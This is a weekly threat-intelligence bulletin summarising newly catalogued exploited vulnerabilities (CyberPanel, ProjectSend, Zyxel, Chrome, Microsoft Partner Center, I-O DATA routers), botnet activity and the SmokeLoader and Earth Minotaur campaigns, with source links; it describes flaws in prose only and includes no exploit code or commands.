This week, four vulnerabilities were added to the CISA KEV catalog, impacting CyberPanel, North Grid Proself, ProjectSend, and Zyxel devices. Active exploitation of Microsoft Partner Center and I-O DATA routers underscores significant risks to privileged access and network integrity. Google addressed a critical Chromium flaw, mitigating arbitrary code execution threats.

Botnet activity surged, with Zerobot targeting Tenda WiFi routers, Andoryu exploiting GitLab vulnerabilities, and various botnets attacking Huawei routers. IoT Reaper continues to exploit a decade-old Cisco router vulnerability, highlighting risks posed by outdated systems.

Additionally, SmokeLoader malware and the Earth Minotaur group exhibited increased activity, underscoring the need for robust defenses against evolving cyber threats.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.  

CVE-2024-51378

Cyber Panel versions 2.3.6 and 2.3.7 contain a critical flaw (CVSS 10) within the getresetstatus functionality in dns/views.py and ftp/views.py. This vulnerability facilitates remote command execution by circumventing middleware security, categorizing it as a significant threat. The vulnerability has been included in the CISA KEV catalog, emphasizing its priority for patching.  

‍CVE-2024-11680

A critical improper authentication vulnerability (CVSS 9.8) in the open-source file-sharing application ProjectSend has been identified, enabling remote, unauthenticated attackers to exploit the system by sending specially crafted HTTP requests to its configuration settings. The flaw affects versions prior to r1720. Although initially patched in May 2023, the vulnerability was publicly disclosed in August 2024 with the release of version r1720. This vulnerability has been added to the CISA KEV catalog for heightened awareness and prioritization.  

‍CVE-2024-11667

A directory traversal vulnerability has been discovered in the web management interface of Zyxel ZLD firewall firmware, assigned a CVSS score of 7.5 (high). This flaw has been actively exploited by the Helldown ransomware group to compromise targeted systems. Due to the significant risk posed, this vulnerability has been added to the CISA KEV catalog, underscoring its critical importance for immediate mitigation.  

CVE-2023-45727

A vulnerability in North Grid Proself has been identified, allowing remote, unauthenticated attackers to execute XML External Entity (XXE) attacks. By sending specially crafted XML requests, attackers can exploit this flaw to access and read sensitive files on the server, potentially exposing private account information. With a CVSS score of 7.5 (high), this vulnerability poses a significant risk and has been added to the CISA KEV catalog, emphasizing the urgency for remediation.

‍CVE-2024-49035

An improper access control vulnerability has been identified in the Microsoft Partner Center Platform (partner.microsoft[.]com), allowing unauthenticated attackers to exploit the flaw for privilege escalation over a network. This vulnerability, which has been assigned a CVSS score of 8.7 (high), poses a significant risk by potentially compromising sensitive operations and data. Active exploitation of this flaw has been observed, although the company has not disclosed detailed information about real-world exploitation, leaving the extent of its active use unclear.

‍CVE-2024-12053

A type confusion vulnerability identified in Google Chrome (versions prior to 131.0.6778.108) poses a significant security risk, with a CVSS rating of 8.8 (High). This flaw allows remote attackers to exploit object corruption through specially crafted HTML pages, potentially leading to arbitrary code execution. Such exploitation could compromise user security and privacy by granting unauthorized access to sensitive data and functionalities on targeted systems. This vulnerability underscores the importance of updating to the latest version of Chrome to mitigate potential threats.

‍CVE-2024-45841, CVE-2024-47133 and CVE-2024-52564

Multiple vulnerabilities have been identified in I-O DATA’s UD-LT1 and UD-LT1/EX hybrid LTE routers, with active exploitation reportedly underway. These flaws allow unauthorized access to the device settings from the internet without requiring a VPN connection, raising significant security concerns. I-O DATA acknowledged receiving customer inquiries about the risks, including potential unauthorized access to settings screens. JPCERT/CC has issued an alert, emphasizing that these vulnerabilities pose critical threats such as credential theft, unauthorized command execution, and complete bypassing of firewall protections. Users are strongly advised to implement available security updates and mitigate exposure by restricting remote access.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.    

‍CVE-2017-0199 and CVE-2017-11882

Entities in Taiwan's manufacturing, healthcare, and information technology sectors are being targeted in a newly discovered phishing campaign aimed at distributing the SmokeLoader malware. FortiGuard Labs identified the attack chain beginning with phishing emails containing malicious Microsoft Excel attachments. These attachments exploit long-standing security vulnerabilities, such as CVE-2017-0199 and CVE-2017-11882, to deliver the malware loader called Ande Loader. Once executed, Ande Loader facilitates the deployment of SmokeLoader on compromised systems, potentially enabling attackers to exfiltrate data or execute further malicious activities.  

‍Earth Minotaur campaign exploits Windows and Chrome vulnerabilities to deliver MOONSHINE Exploit kit and DarkNimbus backdoor

Trend Micro researchers have uncovered a campaign by a threat group known as Earth Minotaur, which leverages the MOONSHINE exploit kit to target Android vulnerabilities in instant messaging applications. This activity primarily affects Tibetan and Uyghur communities, raising concerns about regional and political targeting. The MOONSHINE exploit kit is used to deliver the DarkNimbus backdoor to both Android and Windows devices, potentially turning this into a cross-platform threat. Notably, the campaign targets popular apps like WeChat and exploits multiple vulnerabilities in Chromium-based browsers and applications. Regular software updates are strongly recommended to mitigate these risks and prevent exploitation.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2024/12/04/cisa-adds-one-known-exploited-vulnerability-catalog  
2. https://www.cisa.gov/news-events/alerts/2024/12/03/cisa-adds-three-known-exploited-vulnerabilities-catalog  
3. https://thehackernews.com/2024/12/hackers-target-uyghurs-and-tibetans.html
4. https://www.trendmicro.com/en_us/research/24/l/earth-minotaur.html  
5. https://thehackernews.com/2024/12/smokeloader-malware-resurfaces.html  
6. https://www.fortinet.com/blog/threat-research/sophisticated-attack-targets-taiwan-with-smokeloader